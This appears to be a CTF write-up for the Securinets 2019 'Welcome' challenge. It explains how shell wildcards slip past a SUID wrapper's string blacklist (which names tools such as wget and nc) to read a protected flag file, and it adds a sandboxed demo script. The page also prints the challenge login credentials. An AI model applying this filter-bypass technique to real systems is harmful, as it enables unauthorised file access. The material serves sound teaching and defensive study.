Securinets CTF Quals 2019 — Welcome (Pwn) Write-Up

Ameer Pornillos
Mar 25, 2019


Challenge Description:

Unlike other CTFs we build a custom welcome for u \o/

Your goal is to execute welcome binary ssh welcome@51.254.114.246

password : bc09c4a0a957b3c6d8adbb47ab0419f7

This is a simple pwn challenge that I enjoyed solving, since it tests basic knowledge of working with Linux shell commands in a terminal.

In this challenge we are given a binary that we can use to read the flag.

To get the gist of the challenge, its important parts are shown below.

Checking which user we are running as with the id command shows that we have access to the machine as the welcome user.

welcome@vps614257:~$ id
uid=1018(welcome) gid=1018(welcome) groups=1018(welcome)

Listing the files in the user's home directory shows a flag.txt, but the file is readable only by the welcome-cracked user.

welcome@vps614257:~$ ls -al
total 56
dr-xr-xr-x  2 welcome         welcome          4096 Mar 23 20:23 .
drwxr-xr-x 22 root            root             4096 Mar 24 10:18 ..
-rw-r--r--  1 root            root                0 Mar 25 11:24 .bash_history
-rw-r--r--  1 welcome         welcome             0 Mar 24 00:22 .bash_logout
-rw-r--r--  1 welcome         welcome             1 Mar 24 13:33 .bashrc
-r--------  1 welcome-cracked welcome-cracked    76 Mar 23 20:23 flag.txt
-rw-r--r--  1 welcome         welcome           655 May 16  2017 .profile
-r--------+ 1 welcome-cracked welcome          8712 Mar 23 19:09 welcome
-rw-r-----  1 root            root              175 Mar 23 12:27 welcome.c
-r-s--x---  1 welcome-cracked welcome         13088 Mar 23 20:13 wrapper
-rw-r--r--  1 root            root             1741 Mar 23 20:13 wrapper.c

Examining the listing, we can see a wrapper binary that is owned by welcome-cracked and has the SUID (set-user-ID on execution) bit set:

-r-s--x--- 1 welcome-cracked welcome 13088 Mar 23 20:13 wrapper

This means the binary runs with welcome-cracked's privileges rather than those of the welcome user who invokes it, so any command it executes can read flag.txt. Note from the mode bits that the welcome group may execute the binary but not read it, so we cannot inspect the binary itself.

The home directory also contains wrapper.c, the source code of the wrapper binary, and unlike the binary it is world-readable.

Let's take a look at it.

Reading the source, the program waits for the user to enter a command and then checks that command against a list of blacklisted strings. Every occurrence of a blacklisted string is deleted from the command before it is run. Since the check operates on the literal string that was typed, anything the shell only expands later is never seen by it.

The idea in here is that we need to bypass the blacklisted strings.

As expected, the common commands used to read a file are blacklisted:

char * blacklist[]={"cat","head","less","more","cp","man","scp","xxd","dd","od","python","perl","ruby","tac","rev","xz","tar","zip","gzip","mv","flag","txt","python","perl","vi","vim","nano","pico","awk","grep","egrep","echo","find","exec","eval","regexp","tail","head","less","cut","tr","pg","du","`","$","(",")","#","bzip2","cmp","split","paste","diff","fgrep","gawk","iconv","ln","most","open","print","read","{","}","sort","uniq","tee","wget","nc","hexdump","HOSTTYPE","$","arch","env","tmp","dev","shm","lock","run","var","snap","nano","read","readlink","zcat","tailf","zcmp","zdiff","zegrep","zdiff"};

Note also that the strings flag and txt are blacklisted, and the file we want to read is named flag.txt.

So how can we read the file if those strings are blacklisted?

Easy. 😉

We can just use wildcards.

Wildcards are commonly used in shell commands on Linux and other Unix-like operating systems. A wildcard is a character that stands in for any of a class of characters; the shell expands it against the matching filenames (globbing) before the command is executed.

For example, a question mark (?) can be used as a wildcard in shell commands to represent exactly one character.

An asterisk (*) represents any string of characters, including the empty string.

More on this can be found in The Linux Information Project (LINFO) article on how to use wildcards.

Going back to the challenge, there are many ways to do this, but the usual way to read flag.txt would be the command /bin/cat flag.txt.

/bin/cat flag.txt

That command obviously won't get through the filter, since it contains the blacklisted strings cat, flag and txt. With wildcards, we can write it as /bin/c?t fl* instead: the filter finds no blacklisted substring in it, and the shell later expands c?t to cat and fl* to flag.txt because those are the only matching names in /bin and in the working directory. (This relies on each pattern matching exactly one file; if c?t also matched cut in /bin, the expanded command line would break.)

/bin/c?t fl*

Running that command through the wrapper prints the flag:

welcome@vps614257:~$ ./wrapper
Welcome to Securinets Quals CTF o/
Enter string:
/bin/c?t fl*
securinets{who_needs_exec_flag_when_you_have_linker_reloaded_last_time!!!?}

Flag is:

securinets{who_needs_exec_flag_when_you_have_linker_reloaded_last_time!!!?}

We successfully bypassed the program's command filter and read the flag.
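The following script is an added example written for this page; it is not the challenge's wrapper.c (which the page does not reproduce) and not the author's code. It models the filter as the write-up describes it (every occurrence of a blacklisted string is deleted, then the remainder is handed to a shell; that deletion semantic is an assumption), uses a subset of the blacklist shown above, and runs the naive and the wildcard commands against a constructed sandbox directory that holds a fake flag and a bin/cat symlink, so it does not depend on what else lives in the real /bin. The function names (filter, run_filtered, make_sandbox, glob_is_unique) are this example's own.

```shell
#!/bin/sh
# Added example (not the challenge's wrapper.c): model of a strip-the-blacklist
# filter and the glob bypass the write-up uses. Runs under POSIX sh or bash.

# Subset of the challenge's blacklist, one entry per line (entries copied from
# the write-up). Note what is absent: the glob metacharacters * ? and [.
BLACKLIST='cat
head
less
more
cp
flag
txt
exec
eval
`
$
(
)
{
}'

# strip_word STRING WORD: print STRING with every occurrence of WORD removed.
# The quoted "$sw_w" inside the patterns makes the match literal, not a glob.
strip_word() {
    sw_s=$1 sw_w=$2 sw_out=
    while :; do
        case $sw_s in
            *"$sw_w"*) sw_out=$sw_out${sw_s%%"$sw_w"*}; sw_s=${sw_s#*"$sw_w"} ;;
            *)         sw_out=$sw_out$sw_s; break ;;
        esac
    done
    printf '%s\n' "$sw_out"
}

# filter CMD: apply the whole blacklist to the literal string, as the wrapper is
# described to do. This is where the check happens, before any shell processing.
filter() {
    f_cmd=$1
    f_ifs=$IFS
    IFS='
'
    set -f                      # no pathname expansion while splitting the list
    for f_w in $BLACKLIST; do
        f_cmd=$(strip_word "$f_cmd" "$f_w")
    done
    set +f
    IFS=$f_ifs
    printf '%s\n' "$f_cmd"
}

# run_filtered CMD DIR: the wrapper's effective behaviour. The shell expands any
# surviving wildcards only after the check, against real filenames, which is why
# "c?t fl*" reaches cat(1) as "cat flag.txt".
run_filtered() {
    (cd "$2" && sh -c "$(filter "$1")")
}

# make_sandbox: constructed directory with a fake flag and a bin/cat symlink;
# prints its path. The flag value is made up for this example.
make_sandbox() {
    ms_d=$(mktemp -d)
    mkdir "$ms_d/bin"
    ln -s "$(command -v cat)" "$ms_d/bin/cat"
    printf 'FAKE{constructed_flag}\n' > "$ms_d/flag.txt"
    printf '%s\n' "$ms_d"
}

# glob_is_unique DIR PATTERN: succeed only if PATTERN, expanded inside DIR, names
# exactly one existing path. Worth checking before relying on a wildcard: had
# /bin/c?t also matched /bin/cut on the target, the expanded command would have
# been "cat cut flag.txt" and the trick would have failed.
glob_is_unique() {
    (
        cd "$1" || exit 1
        set -- $2               # unquoted on purpose: expand the glob into $@
        [ "$#" -eq 1 ] && [ -e "$1" ]
    )
}

# Stand-alone demonstration.
d=$(make_sandbox)
echo "naive command after filtering   : $(filter 'bin/cat flag.txt')"
echo "wildcard command after filtering: $(filter 'bin/c?t fl*')"
echo "output of the wildcard command  : $(run_filtered 'bin/c?t fl*' "$d")"
rm -rf "$d"
```

The naive command is mangled to "bin/ ." and fails, while the wildcard form passes the filter untouched and reads the file. The general lesson is that a blacklist applied to the raw string cannot account for transformations the shell performs afterwards: this list strips $, backticks and parentheses, yet leaves *, ? and [ alone, and even a complete list of metacharacters would not fix a design that hands user text to a shell.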
